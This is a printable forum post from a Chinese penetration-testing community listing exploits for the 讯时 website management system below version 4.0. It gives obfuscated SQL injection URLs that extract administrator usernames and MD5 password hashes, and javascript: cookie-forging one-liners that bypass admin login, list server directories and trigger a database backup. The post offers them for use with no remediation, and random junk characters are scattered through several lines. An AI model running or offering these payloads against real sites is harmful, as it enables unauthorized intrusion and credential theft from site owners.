中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入
" U' M1 J/ e- m' I: _1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=25 m' r7 G$ d3 z+ N/ H7 b3 f3 L
. e! L' p& ^0 [, b
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
% ]; z7 z+ K. z7 m  S/ S& g3 `$ r+ I/ I; T第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
6 k" h1 P, v5 d! u5 m可得到用户名和MD5加密码的密码。
  ]4 u6 J: I& G/ k0 k+ @3 t+ s0 K) c: C4 `2 b
二、cookies欺骗4 w( L  H# i8 O2 r' m) t& q

# j% [6 B2 z% D7 |& z1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. , U4 m5 u4 F- \+ l! H
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp", Y3 I7 ~3 C3 N$ l

0 J* X: j& S. t# l* w2、列目录. / R, X) T3 @' h. a& F
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
9 x8 g' H) q+ w9 C1 z! P& d. K
6 Z- P& x+ E& I  S: _7 y3、数据库备份(适用性好像比较低.)
; ~2 L) j/ _9 E, q! q. C9 sjavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
1 d- X9 i/ V3 l/ `  E$ M- E  z* [. R" P8 u- [  k& N
4、得到MD5密码解不了密进后台方法" B8 b+ {+ Q# ^% y
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
( H$ {6 [3 \8 `  {0 ]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2